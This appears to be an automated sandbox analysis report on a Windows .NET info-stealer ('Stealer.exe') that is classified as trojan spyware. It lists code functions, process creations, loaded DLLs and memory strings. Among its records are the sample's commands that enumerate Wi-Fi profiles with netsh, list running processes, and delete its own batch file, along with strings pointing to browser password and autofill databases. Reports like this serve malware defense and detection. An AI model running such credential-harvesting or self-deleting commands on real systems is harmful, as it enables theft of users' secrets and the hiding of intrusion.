Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05004B38	0_2_05004B38
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050023B0	0_2_050023B0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050037E0	0_2_050037E0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05004250	0_2_05004250
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500B6C0	0_2_0500B6C0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500BAC8	0_2_0500BAC8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500E92F	0_2_0500E92F
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050099A8	0_2_050099A8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050041C6	0_2_050041C6
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500F888	0_2_0500F888
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050090C2	0_2_050090C2
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050090E0	0_2_050090E0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500A721	0_2_0500A721
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_050037D1	0_2_050037D1
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05009E28	0_2_05009E28
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05003A30	0_2_05003A30
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_05007D08	0_2_05007D08
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0500B6B3	0_2_0500B6B3
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B5640	0_2_064B5640
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BA6F8	0_2_064BA6F8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BA2F0	0_2_064BA2F0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BDB48	0_2_064BDB48
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B5F60	0_2_064B5F60
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BF718	0_2_064BF718
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B3F8B	0_2_064B3F8B
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B2B90	0_2_064B2B90
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B6BB0	0_2_064B6BB0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B27B0	0_2_064B27B0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B0040	0_2_064B0040
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B5060	0_2_064B5060
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B6880	0_2_064B6880
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BED28	0_2_064BED28
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B45C0	0_2_064B45C0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BF1D8	0_2_064BF1D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BA758	0_2_064BA758
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B0B67	0_2_064B0B67
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BB378	0_2_064BB378
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B3B08	0_2_064B3B08
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BF708	0_2_064BF708
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064B0CEF	0_2_064B0CEF
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BED11	0_2_064BED11
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BF1C1	0_2_064BF1C1
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07451840	0_2_07451840
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07450040	0_2_07450040
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07457A58	0_2_07457A58
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07453F61	0_2_07453F61
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07453A18	0_2_07453A18
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07455428	0_2_07455428
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0745EEC0	0_2_0745EEC0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07450EC8	0_2_07450EC8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_074527D8	0_2_074527D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_074534F8	0_2_074534F8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07458A80	0_2_07458A80
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_074582A8	0_2_074582A8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07457A48	0_2_07457A48
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07455169	0_2_07455169
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07452F88	0_2_07452F88
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0745EEB2	0_2_0745EEB2
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07728118	0_2_07728118
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07724DD8	0_2_07724DD8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077261BA	0_2_077261BA
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07720040	0_2_07720040
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07722A48	0_2_07722A48
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772CE30	0_2_0772CE30
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07729018	0_2_07729018
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077262FE	0_2_077262FE
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077268D8	0_2_077268D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077272D8	0_2_077272D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077260B9	0_2_077260B9
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772DCB9	0_2_0772DCB9
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07722098	0_2_07722098
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07726498	0_2_07726498
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772933A	0_2_0772933A
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07722320	0_2_07722320
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772B9D8	0_2_0772B9D8
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772A992	0_2_0772A992
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07723390	0_2_07723390
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07727638	0_2_07727638
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07728020	0_2_07728020
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772562F	0_2_0772562F
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07725A13	0_2_07725A13
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772521D	0_2_0772521D
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07721ED0	0_2_07721ED0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772C8C0	0_2_0772C8C0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772C8B6	0_2_0772C8B6
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_077268A0	0_2_077268A0
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772CC80	0_2_0772CC80
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07722089	0_2_07722089
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_0772986A	0_2_0772986A

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2148

Source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.000000006FFAB000.00000020.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4877667569.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: lastOriginalFileName vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe, 00000000.00000000.4710337021.000000000061C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStealer.exeJ vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 7fE6IkvYWf.exe
Source: 7fE6IkvYWf.exe	Binary or memory string: OriginalFilenameStealer.exeJ vs 7fE6IkvYWf.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/20@2/2

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Code function: 0_2_07450040 CreateToolhelp32Snapshot,

0_2_07450040

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4716
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:304:WilStaging_02

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

File created: C:\Users\user\AppData\Local\Temp\gu1wuocw.yoi

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat

Source: 7fE6IkvYWf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4716)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A841000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CCF000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, tmpE39.tmp.dat.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4C000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D2E000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: 7fE6IkvYWf.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\7fE6IkvYWf.exe "C:\Users\user\Desktop\7fE6IkvYWf.exe"
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4716
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2148
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4716	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak	Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
